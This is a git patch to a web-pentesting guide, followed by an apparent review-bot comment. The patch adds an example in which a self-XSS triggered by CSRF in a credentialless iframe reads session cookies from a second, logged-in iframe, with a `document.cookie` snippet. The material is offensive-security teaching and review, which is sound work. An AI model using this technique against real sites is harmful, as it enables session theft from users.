From 831661ebb6ced266899423e586316fa3373860b6 Mon Sep 17 00:00:00 2001 From: SirBroccoli Date: Mon, 18 Aug 2025 15:50:48 +0200 Subject: [PATCH] Update iframes-in-xss-and-csp.md --- .../iframes-in-xss-and-csp.md | 28 +++++++++++++++++-- 1 file changed, 25 insertions(+), 3 deletions(-) diff --git a/src/pentesting-web/xss-cross-site-scripting/iframes-in-xss-and-csp.md b/src/pentesting-web/xss-cross-site-scripting/iframes-in-xss-and-csp.md index b0795ab99..6f76847f7 100644 --- a/src/pentesting-web/xss-cross-site-scripting/iframes-in-xss-and-csp.md +++ b/src/pentesting-web/xss-cross-site-scripting/iframes-in-xss-and-csp.md @@ -199,10 +199,32 @@ window.top[1].document.cookie = 'foo=bar'; // write alert(window.top[2].document.cookie); // read -> foo=bar ``` -To embed 3rd-party content in pages that already enforce COEP you can now simply use: +- Exploit example: Self-XSS + CSRF -```html - +In this attack, the attacker prepares a malicious webpage with 2 iframes: + +- An iframe that loads the victim's page with the `credentialless` flag with a CSRF that triggers a XSS (Imagin a Self-XSS in the username of the user): + ```html + + +
+ + + +
+ + + + ``` + +- Another iframe that actually has the user logged in (without the `credentialless` flag). + +Then, from the XSS it's possible to access the other iframe as they have the same SOP and steal the cookie for example executing: + +```javascript +alert(window.top[1].document.cookie); ``` ### fetchLater Attack
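Review bot: the new "Exploit example" text in this hunk has wording and precision problems worth fixing before merge. "Imagin a Self-XSS" should read "Imagine a Self-XSS", "triggers a XSS" should be "triggers an XSS", and "as they have the same SOP" is imprecise: the two frames are accessible to each other because they share the same origin, not because they share "the same SOP" (the same-origin policy is what permits the access). The closing snippet `alert(window.top[1].document.cookie);` also depends on frame order: the context above this hunk writes via `window.top[1]` and reads via `window.top[2]`, while the new text lists the credentialless iframe first and the logged-in iframe second, so the index used must match the position of the credentialed (non-credentialless) iframe in the attacker page; say explicitly which frame index the example assumes, e.g. "assuming the logged-in iframe is the second child frame, reachable as window.top[1]". Finally, the inner ` ```html ` fence nested inside the list item should be checked to ensure it is closed before the next list item, otherwise the rest of the section renders inside the code block.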